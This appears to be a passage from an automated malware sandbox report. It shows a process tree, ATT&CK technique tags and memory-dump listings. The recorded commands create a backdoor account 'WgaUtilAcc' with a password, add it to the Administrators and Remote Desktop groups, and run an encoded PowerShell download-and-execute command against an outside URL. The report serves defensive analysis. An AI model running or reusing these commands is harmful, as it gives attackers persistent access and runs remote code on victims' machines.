  net.exe user WgaUtilAcc 000000 /del
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3556
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
    3⤵
    PID:4048

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc k6h9TpeG /add
1⤵
- Suspicious use of WriteProcessMemory
PID:4224
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc k6h9TpeG /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:620
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc k6h9TpeG /add
    3⤵
    PID:1184

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:1616
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1488
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    3⤵
    PID:1408

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:2340
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2440
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
    3⤵
    PID:2516

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:2788
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2384
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
    3⤵
    PID:4132

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc k6h9TpeG
1⤵
- Suspicious use of WriteProcessMemory
PID:4932
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc k6h9TpeG
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1220
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc k6h9TpeG
    3⤵
    PID:5004

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:2652
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Modifies data under HKEY_USERS
  PID:4164

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:5000
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  - Modifies data under HKEY_USERS
  PID:3880

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:5048
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:3444
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    PID:360

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Account Manipulation

T1098

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/60-142-0x000001DFB0800000-0x000001DFB0802000-memory.dmp

Filesize
8KB

Download
memory/60-140-0x000001DFB0800000-0x000001DFB0802000-memory.dmp

Filesize
8KB

Download
memory/60-129-0x000001DFB0800000-0x000001DFB0802000-memory.dmp

Filesize
8KB

Download
memory/60-130-0x000001DFB0800000-0x000001DFB0802000-memory.dmp

Filesize
8KB

Download
memory/60-131-0x000001DFB0800000-0x000001DFB0802000-memory.dmp

Filesize
8KB

Download
memory/60-132-0x000001DFB0800000-0x000001DFB0802000-memory.dmp

Filesize
8KB

Download
memory/60-133-0x000001DFC8AF0000-0x000001DFC8AF1000-memory.dmp

Filesize
4KB

Download
memory/60-134-0x000001DFB0800000-0x000001DFB0802000-memory.dmp

Filesize
8KB

Download
memory/60-137-0x000001DFC8BD3000-0x000001DFC8BD5000-memory.dmp

Filesize
8KB

Download
memory/60-135-0x000001DFC8BD0000-0x000001DFC8BD2000-memory.dmp

Filesize
8KB

Download
memory/60-136-0x000001DFB0800000-0x000001DFB0802000-memory.dmp

Filesize
8KB

Download
memory/60-138-0x000001DFB0800000-0x000001DFB0802000-memory.dmp

Filesize
8KB

Download
memory/60-139-0x000001DFC8CE0000-0x000001DFC8CE1000-memory.dmp

Filesize
4KB

Download
memory/60-155-0x000001DFC8B50000-0x000001DFC8B51000-memory.dmp

Filesize
4KB

Download
memory/60-157-0x000001DFB0800000-0x000001DFB0802000-memory.dmp

Filesize
8KB

Download
memory/60-161-0x000001DFC9D60000-0x000001DFC9D61000-memory.dmp

Filesize
4KB

Download
memory/60-146-0x000001DFB0800000-0x000001DFB0802000-memory.dmp

Filesize
8KB

Download
memory/60-147-0x000001DFC8BD6000-0x000001DFC8BD8000-memory.dmp

Filesize
8KB

Download
memory/60-169-0x000001DFC8BD8000-0x000001DFC8BD9000-memory.dmp

Filesize
4KB

Download
memory/60-162-0x000001DFCA0F0000-0x000001DFCA0F1000-memory.dmp

Filesize
4KB

Download
memory/360-398-0x00000204EEFD6000-0x00000204EEFD8000-memory.dmp

Filesize
8KB

Download
memory/360-449-0x00000204EEFD8000-0x00000204EEFD9000-memory.dmp

Filesize
4KB

Download
memory/360-391-0x00000204EEFD0000-0x00000204EEFD2000-memory.dmp

Filesize
8KB

Download
memory/360-393-0x00000204EEFD3000-0x00000204EEFD5000-memory.dmp

Filesize
8KB

Download
memory/700-295-0x0000021FC4093000-0x0000021FC4095000-memory.dmp

Filesize
8KB

Download
memory/700-292-0x0000021FC4090000-0x0000021FC4092000-memory.dmp

Filesize
8KB

Download
memory/700-293-0x0000021FC4098000-0x0000021FC409A000-memory.dmp

Filesize
8KB

Download
memory/700-297-0x0000021FC4096000-0x0000021FC4098000-memory.dmp

Filesize
8KB

Download
memory/2452-118-0x0000000000AA0000-0x0000000000AB6000-memory.dmp

Filesize
88KB

Download
memory/2932-177-0x000001AD7E850000-0x000001AD7E852000-memory.dmp

Filesize
8KB

Download
memory/2932-182-0x000001AD7E850000-0x000001AD7E852000-memory.dmp

Filesize
8KB

Download
memory/2932-181-0x000001AD7EF53000-0x000001AD7EF55000-memory.dmp

Filesize
8KB

Download
memory/2932-180-0x000001AD7EF50000-0x000001AD7EF52000-memory.dmp

Filesize
8KB

Download
memory/2932-178-0x000001AD7E850000-0x000001AD7E852000-memory.dmp

Filesize
8KB

Download
memory/2932-185-0x000001AD7E850000-0x000001AD7E852000-memory.dmp

Filesize
8KB

Download
memory/2932-176-0x000001AD7E850000-0x000001AD7E852000-memory.dmp

Filesize
8KB

Download
memory/2932-184-0x000001AD7EF56000-0x000001AD7EF58000-memory.dmp

Filesize
8KB

Download
memory/2932-186-0x000001AD7E850000-0x000001AD7E852000-memory.dmp

Filesize
8KB

Download
memory/2932-210-0x000001AD7EF58000-0x000001AD7EF5A000-memory.dmp

Filesize
8KB

Download
memory/2932-174-0x000001AD7E850000-0x000001AD7E852000-memory.dmp

Filesize
8KB

Download
memory/2932-172-0x000001AD7E850000-0x000001AD7E852000-memory.dmp

Filesize
8KB

Download
memory/2932-171-0x000001AD7E850000-0x000001AD7E852000-memory.dmp

Filesize
8KB

Download
memory/2932-173-0x000001AD7E850000-0x000001AD7E852000-memory.dmp

Filesize
8KB

Download
memory/3080-126-0x000001FCE4EC5000-0x000001FCE4EC6000-memory.dmp

Filesize
4KB

Download
memory/3080-125-0x000001FCE4EC3000-0x000001FCE4EC5000-memory.dmp

Filesize
8KB

Download
memory/3080-127-0x000001FCE4EC6000-0x000001FCE4EC7000-memory.dmp

Filesize
4KB

Download
memory/3080-124-0x000001FCE4EC0000-0x000001FCE4EC2000-memory.dmp

Filesize
8KB

Download
memory/3080-122-0x000001FCFDBB0000-0x000001FCFDFAF000-memory.dmp

Filesize
4.0MB

Download
memory/3320-115-0x00000000009C7000-0x00000000009D8000-memory.dmp

Filesize
68KB

Download
memory/3320-116-0x00000000007D0000-0x00000000007D9000-memory.dmp

Filesize
36KB

Download
memory/3320-117-0x0000000000400000-0x0000000000772000-memory.dmp

Filesize
3.4MB

Download
memory/5012-253-0x000001BC7F286000-0x000001BC7F288000-memory.dmp

Filesize
8KB

Download
memory/5012-250-0x000001BC7F280000-0x000001BC7F282000-memory.dmp

Filesize
8KB

Download
memory/5012-251-0x000001BC7F283000-0x000001BC7F285000-memory.dmp

Filesize
8KB

Download